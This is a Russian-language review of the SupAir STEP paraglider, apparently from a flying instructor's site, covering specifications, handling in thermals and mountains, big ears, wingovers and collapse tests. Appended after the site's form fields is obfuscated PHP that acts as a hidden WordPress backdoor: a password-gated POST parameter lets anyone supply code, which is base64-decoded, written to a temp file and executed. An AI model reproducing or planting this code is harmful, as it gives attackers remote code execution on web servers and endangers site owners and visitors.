SupAir STEP – уверенный шаг к XC полетам!

Да, технологии спускаются с верхних классов уже лавинообразно. Если использование лесок и безоплеточных строп в В классе вызывало лет пять назад удивление, то теперь это норма!

SupAir, начав заниматься с 2014 г. производством крыльев, выбрал достаточно интересную стратегию. Нет замаха на гоночные крылья ССС класса, исключительно для полетов на соревнованиях. Нет однозначного упора на учебные крылья.
Задача – создавать горные крылья, которые будут давать пилоту сбалансированную информацию, чутко управляться в потоке и выпаривать в утренних еще слабых потоках в горах. Лететь без истерики в турбулентности и давать возможность садиться на очень ограниченные площадки.

Итак, STEP – горное крыло класса En B, итог технологий и опыта крыльев Taska и Wild.

Параплан приехал ко мне в Крым в феврале месяце в весовой вилке 80-100 кг, это размер М и 26 м2.

Sup Air Strike


Удлинение: 5.7
– немаленькое, но и не самое высокое.

Вес параплана в этом размере: 5 кг – это не облегченное крыло. Такой вес, похоже, из-за большого количества лесок и использования ресурсной ткани.
Количество секций: 61 – что говорит о достаточно сильно “вылизанном” профиле.
Передняя кромка в стиле shark nose с 30-ти сантиметровыми лесками. В задней кромке используются мини ребра.
Ткань:
Верх – Universal Porcher 38 г / м² , что говорит о достаточном запасе ресурса.
Низ – Universal Porcher 32 г / м² и такая же в нервюрах.

Свободные концы: трехрядные – классические для нашего времени.
Стропы: полностью безоплеточные, из Edelrid.

Все элементы параплана изготовлены на высоком уровне. Все продумано и эргономично. Учтены мельчайшие нюансы, что само по себе очень приятно. Казалась бы такая мелочь, как обычное керамическое кольцо вместо ролика на клеванте, но это удобно и, черт возьми, комфортно! Нет скрипящего звука у тебя под ухом, как будто ты не зажимаешь клеванту, а душишь мышь в руке :)))

Теперь о Step в полете

Так как в Крыму в Феврале термичных полетов не сильно много, больше удалось полетать в термодинамике. Загрузка крыла 95-98 кг. Подвесная система открытая.

Sup Air Strike

Sup Air Strike

Sup Air Strike

Старт в ветер 6-8 мс. Крыло выходит в такой плотный ветер достаточно энергично, но за счет “акульего профиля” оно не сильно стреляет. В воздухе чувствуется достаточно высокая триммерная скорость, параплан хорошо идет за клевантой, нет задержки. Что мне нравится в крыльях Sup Air – это сбалансированность в управлении. Информация приходит как и на клеванты так и на подвеску. Параплан очень хорошо рулится весом, я бы сказал, что очень хорошо! При повороте нет сильной потери высоты.

Полеты в горах

Удалось полетать на Демерджи со Step-ом, хоть и не долго.

В горах чувствуется, что крыло любит узкие и сильные потоки, так и хочется его поставить на “нож”. Информация о потоке и турбулентности хорошо чувствуется через клеванты. В слабых условиях крыло ведет себя не менее достойно. Слабые потоки с еле прогретого скальника можно смело обрабатывать.

Sup Air Strike

Sup Air Strike

Sup Air Strike


Работа акселератора

Крыло заметно добавляет в скорости, GPS с собой не было и прирост сказать не смогу, но он значительный. На акселераторе параплан хорошо рулится С-рядом, практически так же, как и клевантами.

Режим “Уши”

Складываются легко, из рук не вырываются, подлипают, в результате чего держать их удобно. Снижение увеличивается на 1.5-2 м/с. Весом на “ушах” крыло рулится хорошо. При отпускании иногда подлипают, после качка клевантами раскрываются.

Sup Air Strike

Винговеры

Крыло практически со второго кача уходит в уровень с пилотом, винговеры получаются глубокими, амплитуду держать не составляет сложности.

Sup Air Strike
Были проведены тесты на ассиметричное, фронтальное сложение.

Ассиметричное сложение

Если не компенсировать, параплан делает доворот на 15-30 грд в сторону сложения, сильного клевка не происходит, сложенная консоль раскрывается самостоятельно.
При компенсации весом параплан не меняет своей траектории, если даже удерживать сложенную консоль.

Sup Air Strike


Фронтальное сложение

Происходит сложение передней трети хорды, клевок крыла не критичный 30-40 грд вперед. Приостанавливать крыло пришлось пару раз из шести. Нет энергичного “нырка”, считаю что это связано с формой воздухозаборников. Нет энергичного наполнения крыла и из-за строения передней кромки нет мощного клевка. Ширина воздухозаборников 4-6 см и это я считаю основной причиной отсутствия сильного клевка вперед.

Sup Air Strike

Sup Air Strike
Заход на посадку как на гору, так и внизу простой и интуитивный. Заход на ограниченную площадку при наличии опыта не вызывает особых сложностей.

Общее впечатление:

К сожалению слетать маршрут не удалось из за погодных условий, но это никак не смогло повлиять на позитивное впечатление о STEP.

Чувствуется что крыло больше заточено под маршруты, чуткое управление провоцирует на эксперименты, дает уверенность в воздухе и мотивирует!

Об инструкторе

Обратный звонок

Ваше имя (обязательно)

Ваш телефон (обязательно)

Подарочный сертификат

Ваше имя (обязательно)

Ваш телефон (обязательно)

Выбрать валюту магазина
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}